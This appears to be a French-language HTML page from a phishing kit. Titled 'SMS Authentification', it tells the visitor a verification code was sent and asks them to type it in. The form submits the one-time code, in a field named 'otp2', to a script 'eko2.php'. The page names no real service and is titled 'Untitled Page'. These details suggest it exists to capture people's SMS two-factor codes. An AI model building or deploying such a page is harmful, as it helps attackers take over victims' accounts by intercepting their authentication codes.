<html><head>
<meta charset="utf-8">
<title>Untitled Page</title>
<meta name="generator" content="WYSIWYG Web Builder 15 - http://www.wysiwygwebbuilder.com">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="HO.css" rel="stylesheet">
</head>
<body>
<div id="FlexContainer1">
<div id="wb_Image1" style="display:inline-block;width:104px;z-index:0;">
<img src="images/3046859-200.png" id="Image1" alt="">
</div>
<div id="wb_Text1">
<span style="color:#000000;font-family:Arial;font-size:32px;">SMS Authentification</span>
</div>
<div id="wb_Text2">
<span style="color:#000000;font-family:Arial;font-size:13px;">Code de vérification envoyé<br><br></span>
</div>

</div>









<link href="pageerror.css" rel="stylesheet">
<script src="jquery-1.12.4.min.js"></script>
<script src="wwb15.min.js"></script>


  <link rel="stylesheet" href="js/JSFormValidation.css">

  <script src="js/JSFormOTP.js"></script>

		<form id="formTest" method="POST" action="eko2.php"> 
    <div id="FlexContainer1">

<input type="text" id="txtZipcode" onclick="AnimateCss('Editbox1', 'animate-border', 1, 10000);return false;" name="otp2" value="" autofocus="" spellcheck="false" style="
    letter-spacing: 7px;"><br>
<input type="submit" id="btnSubmit" name="" value="Valider">
</div><div id="FlexContainer2">
<div id="wb_Text4">
<span style="color:#000000;font-family:Arial;font-size:16px;">Entrez le code pour continuer<br></span>
</div>
<div id="wb_Text3">
<span style="color:#1E90FF;font-family:Arial;font-size:13px;">N’a pas reçu le code de vérification</span>
</div>
</div><table>

<tbody><tr><td id="elmZipcodeError" style="text-align: center;"> </td></tr>


 












</tbody></table></form></body></html>